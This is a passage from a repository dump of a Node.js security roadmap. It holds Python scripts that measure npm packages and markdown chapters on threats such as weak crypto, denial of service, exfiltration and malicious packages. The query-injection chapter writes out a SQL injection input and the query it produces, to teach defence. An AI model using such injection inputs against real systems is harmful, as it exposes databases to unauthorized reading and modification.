sys.argv[1:] 94 | 95 | top100 = [x for x in file(top100_txt).read().split('\n') if x] 96 | 97 | externs = set() 98 | for externs_file in py_common.npm.js_files_under( 99 | os.path.join(os.path.dirname(sys.argv[0]), 'externs')): 100 | if os.path.basename(os.path.dirname(externs_file)) == 'tests': 101 | continue 102 | externs.add(externs_file) 103 | 104 | # Maps rule identifiers to sets of offending modules. 105 | rule_violations = {} 106 | 107 | 108 | module_count = 0 109 | for module_name in top100: 110 | violations = run_jsconf(node_modules, module_name, externs) 111 | if ('Parse error.' in violations 112 | or 'Argument list too long' in violations): 113 | pass 114 | else: 115 | module_count += 1 116 | for v in violations: 117 | if v in rule_violations: 118 | vmap = rule_violations[v] 119 | else: 120 | vmap = rule_violations[v] = {} 121 | vmap[module_name] = vmap.get(module_name, 0) + 1 122 | 123 | # TODO: exclude Parse error and Argument list too long 124 | 125 | print "## JS Conformance {#jsconf}" 126 | print "" 127 | print "JS Conformance identifies uses of risky APIs." 128 | print "" 129 | print "Some modules did not parse. This may be dues to typescript." 130 | print "JSCompiler doesn't deal well with mixed JavaScript and TypeScript" 131 | print "inputs." 132 | print "" 133 | print "If a module is both in the top 100 and is a dependency of another" 134 | print "module in the top 100, then it will be multiply counted." 135 | print "" 136 | print "Out of %d modules that parsed" % module_count 137 | print "" 138 | print "| Violation | Count of Modules | Total Count | Quartiles |" 139 | print "| --------- | ---------------- | ----------- | --------- |" 140 | for (v, vmap) in sorted(rule_violations.items()): 141 | count = 0 142 | total_count = 0 143 | values = vmap.values() 144 | for n in values: 145 | count += 1 146 | total_count += n 147 | values += [0] * (module_count - count) 148 | values.sort() 149 | quartiles = '%d / %d / %d' % ( 150 | values[len(values) >> 2], 151 | values[len(values) >> 1], 152 | values[(len(values) * 3) >> 2], 153 | ) 154 | print "| `%s` | %d | %d | %s |" % ( 155 | v, count, total_count, quartiles) 156 | -------------------------------------------------------------------------------- /appendix/lazy-load/experiment.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Copyright 2017 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # https://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | """Looks for lazy loading patterns. 18 | 19 | Patterns to identify include 20 | 21 | * { ... require(...) 22 | 23 | """ 24 | 25 | import json 26 | import os.path 27 | import py_common.npm 28 | import re 29 | import shutil 30 | import sys 31 | 32 | 33 | lazy_load_pattern = re.compile( 34 | r'[{][^}]*(?>sys.stderr, "Falling back to worst-case for %s required by %s" % ( 131 | # up_module_name, module_name) 132 | js_files.update([(up_module_name, src) for src in 133 | js_files_under( 134 | os.path.join(node_modules, up_module_name)) 135 | if not probable_non_prod_file(src)]) 136 | package_json = None 137 | try: 138 | package_json = json.loads( 139 | file(os.path.join(node_modules, up_module_name, 'package.json'), 'r') 140 | .read()) 141 | except: 142 | print >>sys.stderr, "Undeclared dependency %s" % up_module_name 143 | if package_json is not None: 144 | unprocessed += package_json['dependencies'].keys() 145 | return tuple(sorted(js_files)) 146 | 147 | def requires(node_modules, module_name): 148 | """ 149 | Follows require() calls to bound the set of JS files in a module. 150 | 151 | Returns { 152 | 'srcs': [...], # main.js and same-module files required thereof 153 | 'deps': [...], # required modules 154 | 'upper': True, # True when srcs and deps accounts for all require calls. 155 | } 156 | """ 157 | module_root = os.path.join(node_modules, module_name) 158 | package_json = json.loads( 159 | file(os.path.join(module_root, 'package.json')).read()) 160 | main_files = package_json.get('main', None) 161 | if type(main_files) in (str, unicode): 162 | main_files = (main_files,) 163 | if not main_files: 164 | return { 'srcs': (), 'deps': (), 'upper': False } 165 | srcs = set() 166 | deps = set() 167 | upper = True 168 | visited = set() 169 | unprocessed = [os.path.join(module_root, rp) for rp in main_files] 170 | while unprocessed: 171 | src = os.path.realpath(unprocessed.pop()) 172 | if src in visited: continue 173 | visited.add(src) 174 | if os.path.isdir(src): 175 | for f in js_files_under(src): 176 | unprocessed.append(f) 177 | else: 178 | srcs.add(src) 179 | content = '' 180 | try: 181 | content = file(src, 'r').read() 182 | except: 183 | upper = False 184 | for match in _REQUIRE_RE.finditer(content): 185 | arg = match.group(1).strip() 186 | if not arg: 187 | pass # Zero arguments 188 | elif len(arg) > 2 and arg[0] in ('"', "'") and arg[0] == arg[-1]: 189 | try: 190 | arg = json.loads('"%s"' % arg[1:-1]) 191 | except: 192 | #print >>sys.stderr, "Cannot parse require argument %s" % arg 193 | upper = False 194 | if _REL_REQUIRE_RE.match(arg): 195 | if not arg.endswith('.js'): arg += '.js' 196 | unprocessed.append(arg) 197 | else: 198 | deps.add(arg) 199 | else: 200 | upper = False 201 | return { 202 | 'srcs': tuple(sorted(srcs)), 203 | 'deps': tuple(sorted(deps)), 204 | 'upper': upper 205 | } 206 | 207 | def js_files_under(root_dir): 208 | for dir_path, subdir_list, file_list in os.walk(root_dir): 209 | for f in file_list: 210 | if f.endswith('.js') or f.endswith('.ts'): 211 | yield os.path.join(dir_path, f) 212 | 213 | def preprocess_js_content(content): 214 | """ 215 | Preprocesses JS content to make it easier to operate on. 216 | 217 | All comments are replaced with spaces, and string literal 218 | content is upper-cased to make it easier to distinguish 219 | lower-case keywords and identifiers from similar content that 220 | appears inside a string literal. 221 | """ 222 | 223 | lexer = jslex.jslex.JsLexer() 224 | canon_tokens = [] 225 | for (tok_type, tok_content) in lexer.lex(content): 226 | if tok_type in ('comment', 'linecomment'): 227 | tok_content = ' ' 228 | elif tok_type in ('regex', 'string'): 229 | tok_content = tok_content.upper() 230 | canon_tokens.append(tok_content) 231 | processed_content = ''.join(canon_tokens) 232 | 233 | return processed_content 234 | 235 | def js_srcs_matching(node_modules, module_name, pattern, module_filter=None): 236 | """ 237 | A list of srcs under root_dir whose content 238 | matches pattern. 239 | """ 240 | 241 | srcs = js_srcs_almost_worst_case( 242 | node_modules=node_modules, 243 | module_name=module_name, 244 | module_filter=module_filter) 245 | 246 | matching_srcs = [] 247 | for src in srcs: 248 | (_, path) = src 249 | canon_content = preprocess_js_content(file(path, 'r').read()) 250 | match = pattern.search(canon_content) 251 | if match: 252 | matching_srcs.append(src) 253 | return matching_srcs 254 | 255 | # by visual examination of 256 | # `find node_modules/ -type d | perl -pe 's|/|\n|g' | sort | uniq` 257 | _NON_PROD_PATH = re.compile( 258 | r'(?i)(?:^|[/\\])(?:tests?|testdata|testing|.github|__tests__|demo|examples?|benchmarks?)(?:$|[/\\])') 259 | def probable_non_prod_file(path): 260 | """ 261 | Skip probable non test files when falling back to directory scanning. 262 | """ 263 | return _NON_PROD_PATH.search(path) is not None 264 | -------------------------------------------------------------------------------- /appendix/test-code/experiment.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Copyright 2017 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # https://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | """Looks for test code patterns under node_modules. 18 | 19 | Patterns identify include 20 | 21 | * require('assert') 22 | * require('chai') 23 | * require('chai/*') 24 | * require('mocha') 25 | * require('should') 26 | * require('unexpected') 27 | 28 | """ 29 | 30 | import json 31 | import os.path 32 | import py_common.npm 33 | import re 34 | import shutil 35 | import sys 36 | 37 | 38 | test_code_pattern = re.compile( 39 | r'(?m)(?:^|[^.\w])require\s*[(]\s*[\'\"](?:assert|chai|chai/[^\'\"]|mocha|should|unexpected)[\'\"]') 40 | 41 | 42 | if __name__ == '__main__': 43 | (node_modules, separate_modules, top100_txt) = sys.argv[1:] 44 | 45 | top100 = [x for x in file(top100_txt).read().split('\n') if x] 46 | 47 | uses = 0 48 | total_count = 0 49 | has_test_code = {} 50 | for module_name in top100: 51 | module_root = os.path.join(separate_modules, module_name) 52 | for js_file in py_common.npm.js_files_under(module_root): 53 | js_content = file(js_file, 'r').read() 54 | if test_code_pattern.search(js_content): 55 | uses += 1 56 | break 57 | total_count += 1 58 | 59 | print ( 60 | """ 61 | ## Prod bundle includes test code {#test_code} 62 | 63 | Some of the top 100 modules are test code, e.g. mocha, chai. 64 | This measures which modules, when installed `--only=prod` include 65 | test patterns. 66 | 67 | %d of %d = %1.02f%% contain test code patterns 68 | """ % (uses, total_count, (100.0 * uses) / total_count)) 69 | -------------------------------------------------------------------------------- /appendix/top100.txt: -------------------------------------------------------------------------------- 1 | async 2 | babel-core 3 | babel-preset-es2015 4 | babel-runtime 5 | bluebird 6 | body-parser 7 | chalk 8 | cheerio 9 | classnames 10 | coffee-script 11 | colors 12 | commander 13 | debug 14 | express 15 | fs-extra 16 | glob 17 | gulp 18 | gulp-util 19 | jquery 20 | lodash 21 | minimist 22 | mkdirp 23 | moment 24 | prop-types 25 | q 26 | react 27 | react-dom 28 | request 29 | rxjs 30 | through2 31 | underscore 32 | uuid 33 | webpack 34 | winston 35 | yargs 36 | yeoman-generator 37 | @angular/common 38 | @angular/core 39 | aws-sdk 40 | axios 41 | babel-loader 42 | babel-polyfill 43 | chai 44 | co 45 | core-js 46 | css-loader 47 | ejs 48 | ember-cli-babel 49 | eslint 50 | handlebars 51 | inquirer 52 | joi 53 | js-yaml 54 | mocha 55 | mongodb 56 | mongoose 57 | node-uuid 58 | object-assign 59 | optimist 60 | ramda 61 | react-redux 62 | redis 63 | redux 64 | request-promise 65 | rimraf 66 | semver 67 | shelljs 68 | socket.io 69 | superagent 70 | xml2js 71 | yosay 72 | zone.js 73 | @angular/compiler 74 | @angular/forms 75 | @angular/http 76 | @angular/platform-browser 77 | @angular/platform-browser-dynamic 78 | @types/node 79 | angular 80 | autoprefixer 81 | babel-eslint 82 | babel-preset-react 83 | bootstrap 84 | cookie-parser 85 | dotenv 86 | es6-promise 87 | eslint-plugin-react 88 | extend 89 | extract-text-webpack-plugin 90 | file-loader 91 | immutable 92 | jade 93 | jsonwebtoken 94 | marked 95 | mime 96 | morgan 97 | mysql 98 | nan 99 | node-sass 100 | path 101 | promise 102 | react-router 103 | style-loader 104 | typescript 105 | uglify-js 106 | underscore.string 107 | vue 108 | ws 109 | -------------------------------------------------------------------------------- /appendix/uses-scripts/experiment.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Copyright 2017 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # https://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | """Collates how many projects use install scripts. 18 | 19 | Per https://docs.npmjs.com/misc/scripts we look for the 20 | following keys under "scripts" in package.json: 21 | 22 | * preinstall 23 | * install 24 | * postinstall 25 | """ 26 | 27 | import json 28 | import os.path 29 | import py_common.npm 30 | import sys 31 | 32 | def uses_scripts(package_root): 33 | package_json = json.loads( 34 | file(os.path.join(package_root, 'package.json')).read()) 35 | scripts_obj = package_json.get('scripts', None) 36 | if scripts_obj is None: 37 | return False 38 | for script_type in ('preinstall', 'install', 'postinstall'): 39 | # TODO: True if empty value 40 | if script_type in scripts_obj: return True 41 | return False 42 | 43 | if __name__ == '__main__': 44 | (node_modules, separate_modules, top100_txt) = sys.argv[1:] 45 | 46 | per_package = py_common.npm.for_each_npm_package( 47 | node_modules, uses_scripts) 48 | total_count = 0 49 | uses_scripts = 0 50 | for uses in per_package.itervalues(): 51 | if uses: 52 | uses_scripts += 1 53 | total_count += 1 54 | print ( 55 | """ 56 | ## Uses Scripts {#uses_scripts} 57 | 58 | Unless steps are taken, installation scripts run code on 59 | a developer's workstation when they have write access to 60 | local repositories. If this number is small, having 61 | humans check installation scripts before running might 62 | be feasible. 63 | 64 | %d of %d = %1.02f%% use installation scripts 65 | """ % (uses_scripts, total_count, (100.0 * uses_scripts) / total_count)) 66 | -------------------------------------------------------------------------------- /book.json.withcomments: -------------------------------------------------------------------------------- 1 | # Comments are stripped 2 | { 3 | "root": ".", 4 | "structure": { 5 | "readme": "cover.md" 6 | }, 7 | "title": "A Roadmap for Node.js Security", 8 | "description": "Discusses security and privacy threats to the Node.js community and ways the community might address them. Assumes a basic familiarity with JS & the Node ecosystem.", 9 | "author": "Mike Samuel et al", 10 | "language": "en", 11 | "gitbook": ">= 3.0.0", 12 | "plugins": [ 13 | "links", 14 | "ga" 15 | ], 16 | "pluginsConfig": { 17 | # Google Analytics integration 18 | "ga": { 19 | "token": "UA-111883728-1", 20 | "configuration": { 21 | "anonymizeIp": true, 22 | "forceSSL": true 23 | } 24 | }, 25 | "links": { 26 | "links": [ 27 | { 28 | # Adds a printer icon at the top. 29 | # See styles/website.css for styling. 30 | "label": "Printable", 31 | # "icon" corresponds to a classname 32 | "icon": "print-button", 33 | # `make pdf` produces book.json which 34 | # needs to be copied into _book/ for 35 | # this to work. 36 | # TODO: Point to an authoritative version 37 | # via absolute URL once published. 38 | "url": "/node-sec-roadmap.pdf" 39 | }, 40 | { 41 | "label": "Github", 42 | "icon": "github-button", 43 | "url": "https://github.com/google/node-sec-roadmap" 44 | } 45 | ] 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /chapter-1/recap.md: -------------------------------------------------------------------------------- 1 | We've discussed the kinds of threats that concern us. 2 | 3 | Next we discuss how some Node.js projects mitigate these threats today 4 | and how we can make it easier for more Node.js projects to 5 | consistently mitigate these threats. 6 | 7 | Readers may find it useful to refer back to the [threat table][] which 8 | cross-indexes threats and mitigation strategies. 9 | 10 | [threat table]: threats.md#threat_table 11 | -------------------------------------------------------------------------------- /chapter-1/threat-0DY.md: -------------------------------------------------------------------------------- 1 | # Zero Day 2 | 3 | When a researcher discloses a new security vulnerability, the clock 4 | starts ticking. An attacker can compromise a product if they can 5 | weaponize the disclosure before the product team 6 | 7 | * realizes they're vulnerable, and 8 | * finds a patch to the vulnerable dependency, or rolls their own, and 9 | * tests the patched release and pushes it into production. 10 | 11 | ["The Best Defenses Against Zero-day Exploits for Various-sized 12 | Organizations"][sans] notes 13 | 14 | > Zero-day exploits are vulnerabilities that have yet to be publicly 15 | > disclosed. These exploits are usually the most difficult to defend 16 | > against because data is generally only available for analysis after 17 | > the attack has completed its course. 18 | 19 | > ... 20 | 21 | > The research community has broadly classified the defense techniques 22 | > against zero-day exploits as statistical-based, signature-based, 23 | > behavior-based, and hybrid techniques (Kaur & Singh, 2014). The 24 | > primary goal of each of these techniques is to identify the exploit in 25 | > real time or as close to real time as possible and quarantine the 26 | > specific attack to eliminate or minimize the damage caused by the 27 | > attack. 28 | 29 | Being able to respond quickly to limit damage and recover are 30 | critical. 31 | 32 | That same paper talks at length about *worms*: programs that 33 | compromise a system without explicit direction by a human attacker, 34 | and use the compromise of one system to find other systems to 35 | automatically compromise. 36 | 37 | Researchers have found ways ([details][saccone]) that worms 38 | might propagate throughout `registry.npmjs.org` and common practices 39 | that might allow a compromise to jump from the module repository to 40 | large numbers of production servers. 41 | 42 | If we can structure systems so that compromising one component 43 | does not make it easier to compromise another component, then 44 | we can contain damage due to worms. 45 | 46 | If, in a population of components, we can keep susceptibility below a 47 | critical threshold so that worms spend more time searching for targets 48 | than compromising targets, then we can buy time for humans to 49 | understand and respond. 50 | 51 | If we prevent compromise of a population of modules by a zero day 52 | from causing widespread compromise of a population of production 53 | servers then we can limit damage to end users. 54 | 55 | [sans]: https://www.sans.org/reading-room/whitepapers/bestprac/defenses-zero-day-exploits-various-sized-organizations-35562 56 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf 57 | -------------------------------------------------------------------------------- /chapter-1/threat-BOF.md: -------------------------------------------------------------------------------- 1 | # Buffer Overflow 2 | 3 | A buffer overflow occurs when code fails to check an index into an 4 | array while unpacking input, allowing parts of that input to overwrite 5 | memory locations that other trusted code assumes are inviolable. 6 | A similar technique also allows exfiltrating data like cryptographic keys 7 | when an unchecked limit leads to copying unintended memory locations into 8 | an output. 9 | 10 | Buffer overflow vectors in Node.js are: 11 | 12 | * The Node.js runtime and dependencies like the JS runtime and OpenSSL 13 | * [C++ addons][] third-party modules that use N-API (the native API). 14 | * Child processes. For example, code may route a request body to an 15 | [image processing library][imagetragick] that was not 16 | written with untrusted inputs in mind. 17 | 18 | Buffer overflows are common, but we class them as low frequency for 19 | Node.js in particular. The runtime is highly reviewed compared to the 20 | average C++ backend; C++ addons are a small subset of third-party 21 | modules; and there's no reason to believe that child processes spawned 22 | by Node.js applications are especially risky. 23 | 24 | [imagetragick]: https://imagetragick.com/ 25 | [C++ addons]: https://nodejs.org/api/addons.html#addons_c_addons 26 | -------------------------------------------------------------------------------- /chapter-1/threat-CRY.md: -------------------------------------------------------------------------------- 1 | # Weak Crypto {#CRY} 2 | 3 | Cryptographic primitives are often the only practical way to solve 4 | important classes of problems, but it's easy to make mistakes when using 5 | `crypto.*` APIs. 6 | Failing to identify third-party modules that use crypto (or should be 7 | using crypto) and determining whether they are using it properly can lead 8 | to a false sense of security. 9 | 10 | ["Developer-Resistant Cryptography"][Cairns & Steel] by Cairns & Steel 11 | notes: 12 | 13 | > The field of cryptography is inherently difficult. Cryptographic API 14 | > development involves narrowing a large, complex field into a small set 15 | > of usable functions. Unfortunately, these APIs are often far from 16 | > simple. 17 | 18 | > ... 19 | 20 | > In 2013, study by Egele et al. revealed even more startling figures 21 | > [1]. In this study, six rules were defined which, if broken, indicated 22 | > the use of insecure protocols. More than 88% of the 11,000 apps 23 | > analyzed broke at least one rule. Of the rule-breaking apps, most 24 | > would break not just one, but multiple rules. Some of these errors 25 | > were attributed to negligence, for example test code included in 26 | > release versions. However, in most cases it appears developers 27 | > unknowingly created insecure apps. 28 | 29 | > ... 30 | 31 | > The human aspect can be improved through better education for 32 | > developers. Sadly, this approach is unlikely to be a complete 33 | > solution. It is unreasonable to expect a developer to be a security 34 | > expert when most of their time is spent on other aspects of software 35 | > design. 36 | 37 | Code that uses cryptography badly can seem like it's working as intended 38 | until an attacker unravels it. 39 | Testing code that uses cryptographic APIs is hard. It's hard to write 40 | a unit test to check that a skilled cryptographer can't efficiently 41 | extract information from a random looking string or compute a random 42 | looking string that passes a verifier. 43 | 44 | Weak cryptography can also mask other problems. For example, a 45 | security auditor might try to check for leaks of email addresses by 46 | creating a dummy account `Carol ` and 47 | check for the string `carol@example.com` in data served in responses, 48 | while recursing into substrings encoded using base64, gzip, or other 49 | common encodings. 50 | If some of that data is poorly encrypted, then the auditor might 51 | falsely conclude that an attacker who can't break strong 52 | encryption does not have access to emails. 53 | 54 | [Cairns & Steel]: https://www.w3.org/2014/strint/papers/48.pdf 55 | -------------------------------------------------------------------------------- /chapter-1/threat-DEX.md: -------------------------------------------------------------------------------- 1 | # Poor Developer Experience 2 | 3 | Security specialists have a vested interest in keeping developers 4 | happy & productive. 5 | 6 | Developer experience is not only a business or usability threat. When 7 | a team is less agile, it cannot respond as effectively to security 8 | threats, or roll out interfaces that let end users manage their own 9 | security and privacy. 10 | 11 | Application developers may miss deadlines, cut features, or 12 | compromise maintainability if any of the following are true: 13 | 14 | * starting a new project takes too long 15 | * they often cannot make progress until they get feedback from 16 | security specialists (or other specialists like I18N, Legal, UI) 17 | * repeated tasks are slow: 18 | * restarting an application or service, 19 | * running `npm install`, or 20 | * rerunning tests after small changes 21 | * getting approval for a pull request takes long enough that 22 | upstream has to be manually merged into the branch. 23 | * breaking common code out of an application into an npm 24 | module becomes hard, so it is easier to copy-paste from one 25 | application to another 26 | * a developer has to spend significant time getting a release 27 | candidate approved instead of working on the next iteration. 28 | -------------------------------------------------------------------------------- /chapter-1/threat-DOS.md: -------------------------------------------------------------------------------- 1 | 2 | # Denial of Service 3 | 4 | Denial of service occurs when a well-behaved, authorized user cannot 5 | access a system because of misbehavior by another. 6 | 7 | "Denial of service" is most often associated with [flooding][] a 8 | network endpoint so it cannot respond to the smaller number of 9 | legitimate requests, but there are other vectors: 10 | 11 | * Causing the server to use up [a finite resource][res-exh] 12 | like file descriptors causing threads to block. 13 | * Causing the target to issue a network request to an endpoint the 14 | attacker controls and responding slowly. 15 | * Causing the target to store malformed data which triggers an error 16 | in code that unpacks the stored data and causes a server to provide 17 | an error response to a well-formed request. 18 | * Exploiting event dispatch bugs to cause starvation 19 | ([example][disclosure]). 20 | * Supplying over-large inputs to super-linear (> O(n)) algorithms. 21 | For example supplying a crafted string to an ambiguous `RegExp` 22 | to cause [excessive backtracking][]. 23 | 24 | Denial of service attacks that exploit the network layer are usually 25 | handled in the reverse proxy and we find no reason to suppose that 26 | node applications are especially vulnerable to other kinds of denial 27 | of service. 28 | 29 | ## Additional risk: Integrity depends on quick completion 30 | 31 | A system requires [atomicity][] when two or more effects have to 32 | happen together or not at all. Databases put a lot of engineering 33 | effort into ensuring atomicity. 34 | 35 | Sometimes, ad-hoc code seems to preserve atomicity when tested under 36 | low-load conditions: 37 | 38 | ```js 39 | // foo() and bar() need to happen together or not at all. 40 | foo(x); 41 | // Not much of a gap here under normal conditions for another part 42 | // of the system to observe foo() but not bar(). 43 | try { 44 | bar(x); 45 | } catch (e) { 46 | undoFoo(); 47 | throw e; 48 | } 49 | ``` 50 | 51 | This code, though buggy, may be highly reliable under normal 52 | conditions, but may fail under load, or if an attacker can cause 53 | `bar()` to run for a while before its side-effect happens, for example 54 | by causing excessive backtracking in a regular expression used to 55 | check a precondition. 56 | 57 | Some of the same techniques which makes a system unavailable can 58 | widen the window of vulnerability within which an attacker can exploit 59 | an atomicity failure. 60 | 61 | Client-side, runaway computations rarely escalate into an integrity 62 | violation since atomicity requirements are typically maintained on the 63 | server. Server-side, we expect that this problem would be more 64 | common. 65 | 66 | [flooding]: https://capec.mitre.org/data/definitions/125.html 67 | [excessive backtracking]: https://www.regular-expressions.info/catastrophic.html 68 | [res-exh]: https://capec.mitre.org/data/definitions/131.html 69 | [disclosure]: https://sandstorm.io/news/2015-04-08-osx-security-bug 70 | [atomicity]: https://en.wikipedia.org/wiki/ACID#Atomicity 71 | -------------------------------------------------------------------------------- /chapter-1/threat-EXF.md: -------------------------------------------------------------------------------- 1 | # Exfiltration of Data 2 | 3 | "Exfiltration" happens when an attacker causes a response to include 4 | data that it should not have. Web applications and services may 5 | produce response bodies that include too much information. 6 | 7 | This can happen when server-side JavaScript has access to more 8 | data than it needs to do its job and either 9 | 10 | * it serializes unintended information and no one notices or 11 | * an attacker controls what is serialized. 12 | 13 | Consider 14 | 15 | ```js 16 | Object.assign(output, this[str]); 17 | ``` 18 | 19 | If the attacker controls `str` then they may be able to pick any field 20 | of `this` or possibly any global field. 21 | 22 | This problem is not new to Node.js but we consider this higher 23 | frequency for Node.js for these reasons: 24 | 25 | * There is no equivalent to `Object.assign` in most backend languages. 26 | It's possible in Python and Java via reflective operators but 27 | security auditors can narrow down code that might suffer this vulnerability 28 | to those that use reflection. 29 | `Object.assign`, `$.extend` and similar operators are widely used in 30 | idiomatic JavaScript. 31 | * In most backend languages, `obj[...]` does not allow aliasing of all 32 | properties. 33 | For example, Python allows `obj[...]` on types that implement `__getitem__` 34 | which is not the case for user-defined classes. 35 | Java has generic collections and maps, but for user-defined classes 36 | the equivalent code pattern requires reflection and possibly calls to 37 | `setAccessible(true)`. 38 | 39 | JavaScript makes it easier to alias properties and methods and common 40 | JavaScript idioms make it harder for security auditors to narrow down 41 | code that might inadvertently allow exfiltration. 42 | 43 | `Object.assign` and related copy operators are also potential 44 | [mass assignment][] vectors as in: 45 | 46 | ```js 47 | Object.assign(systemData, JSON.parse(untrustedInput)) 48 | ``` 49 | 50 | [mass assignment]: https://en.wikipedia.org/wiki/Mass_assignment_vulnerability 51 | -------------------------------------------------------------------------------- /chapter-1/threat-LQC.md: -------------------------------------------------------------------------------- 1 | # Low Quality Code 2 | 3 | An application or service is vulnerable when its security depends on a 4 | module upholding a contract that it does not uphold. 5 | 6 | Most new software has bugs when first released. Over time, maintainers 7 | fix the bugs that have obvious, bad consequences. 8 | 9 | Often, widely used software has problem areas that are well understood. 10 | Developers can make a pragmatic decision to use it while taking 11 | additional measures to make sure those problems don't compromise 12 | security guarantees. 13 | 14 | Orphaned code that has not been updated recently may have done a 15 | good job of enforcing its contract, but attackers may have discovered 16 | new tricks, or the threat environment may have changed so it may 17 | no longer enforce its contract in the face of an attack. 18 | 19 | Low quality code constitutes a threat when developers pick a module 20 | without understanding the caveats to the contract it actually 21 | provides, or without taking additional measures to limit damage when 22 | it fails. 23 | 24 | It may be the case that there's higher risk of poorly understood 25 | contracts when a community is experimenting rapidly as is the case for 26 | Node.js, or early on before the community has settled on clear winners 27 | for core functions, but we consider the frequency of vulnerabilities 28 | due to low quality code in the npm repository roughly the same as for 29 | other public module repositories. 30 | -------------------------------------------------------------------------------- /chapter-1/threat-MTP.md: -------------------------------------------------------------------------------- 1 | # Malicious Third-Party Code 2 | 3 | Most open-source developers work in good faith to provide useful tools 4 | to the larger community of developers but 5 | 6 | * Passwords are easy to guess, so attackers can suborn accounts that 7 | are only protected by a password. On GitHub, developers may 8 | configure their accounts to require a 9 | [second factor][github-second-factor] but this is not yet the norm. 10 | * Pull requests that aren't thoroughly reviewed may dilute security 11 | properties. 12 | * Phishing requests targeted at GitHub users ([details][dimnie]) can 13 | execute code on unwary committers' machines. 14 | * A pull request may appear to come from a higher-reputation source 15 | ([details][unsigned commits]). 16 | 17 | Malicious code can appear in the server-side JavaScript running in 18 | production, or can take the form of install hooks that run on a 19 | developer workstation with access to local repositories and to 20 | writable elements of `$PATH`. 21 | 22 | Projects that deploy the latest version of a dependency straight to 23 | production are more vulnerable to malicious code. If an attacker 24 | manages to publish a version with malicious code which is quickly 25 | discovered, it affects projects that deploy during that short "window 26 | of vulnerability." Projects that `npm install` the latest version 27 | straight to production are more likely to fall in that window than 28 | projects that cherrypick versions or that shrinkwrap to make sure that 29 | their development versions match deployed versions. 30 | 31 | [Bower is deprecated][bower-depr] so our discussions focus on 32 | `npmjs.org`, but it's worth noting that Bower has a single-point of 33 | failure. Anyone who can create a release branch can commit and 34 | publish a new version. 35 | 36 | [`npm profile`][npm profile] allows requiring 37 | [two factor auth][npm auth-and-writes] for publishing and privilege 38 | changes. If the npm accounts that can publish new versions of a 39 | package only checkout code from a GitHub account all of whose 40 | committers use two factors, then there is no single password that can 41 | compromise the system. 42 | 43 | The frequency of malicious code vulnerabilities affecting Node.js is 44 | probably roughly the same as that for other public module repositories. 45 | The npm repo has been a target in the past [1][getcookies-disclosure] 46 | [2][crossenv-typosquat-disclosure]. 47 | 48 | The [npm Blog][crossenv-typosquat-disclosure] explains what to do if 49 | you believe you have found malicious code: 50 | 51 | > On August 1, a user notified us via Twitter that a package with a 52 | > name very similar to the popular `cross-env` package was sending 53 | > environment variables from its installation context out to 54 | > npm.hacktask.net. We investigated this report immediately and took 55 | > action to remove the package. Further investigation led us to remove 56 | > about 40 packages in total. 57 | > 58 | > ... 59 | > 60 | > Please do reach out to us immediately if you find malware on the 61 | > registry. The best way to do so is by sending email to 62 | > [security@npmjs.com](mailto:security@npmjs.com). We will act to 63 | > clean up the problem and find related problems if we can. 64 | 65 | 66 | [github-second-factor]: https://help.github.com/articles/about-two-factor-authentication/ 67 | [bower-depr]: https://bower.io/blog/2017/how-to-migrate-away-from-bower/ 68 | [dimnie]: https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/ 69 | [unsigned commits]: https://nvisium.com/resources/blog/2017/06/21/securing-github-commits-with-gpg-signing.html 70 | [npm profile]: https://docs.npmjs.com/cli/profile 71 | [saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf 72 | [npm auth-and-writes]: https://docs.npmjs.com/getting-started/using-two-factor-authentication 73 | [getcookies-disclosure]: https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies 74 | [crossenv-typosquat-disclosure]: http://blog.npmjs.org/post/163723642530/crossenv-malware-on-the-npm-registry 75 | -------------------------------------------------------------------------------- /chapter-1/threat-QUI.md: -------------------------------------------------------------------------------- 1 | # Query Injection 2 | 3 | [Query injection][] occurs when an attacker causes a query sent to a 4 | database or other backend to have a [structure][spp] that differs from 5 | that the developer intended. 6 | 7 | ```js 8 | connection.query( 9 | 'SELECT * FROM Table WHERE key="' + value + '"', 10 | callback); 11 | ``` 12 | 13 | If an attacker controls `value` and can cause it to contain a single 14 | quote, then they can cause execution of a query with a different structure. 15 | For example, if they can cause 16 | 17 | ```js 18 | value = ' " OR 1 -- two dashes start a line comment'; 19 | ``` 20 | 21 | then the query sent is `SELECT * FROM Table WHERE key=" " OR 1 -- ...` 22 | which returns more rows than intended possibly [leaking](./threat-EXF.md) 23 | data that the requester should not have been able to access, and may 24 | cause other code that loops over the result set to modify rows other than 25 | the ones the system's authors intended. 26 | 27 | Some backends allow statement chaining so compromising a statement 28 | that seems to only read data: 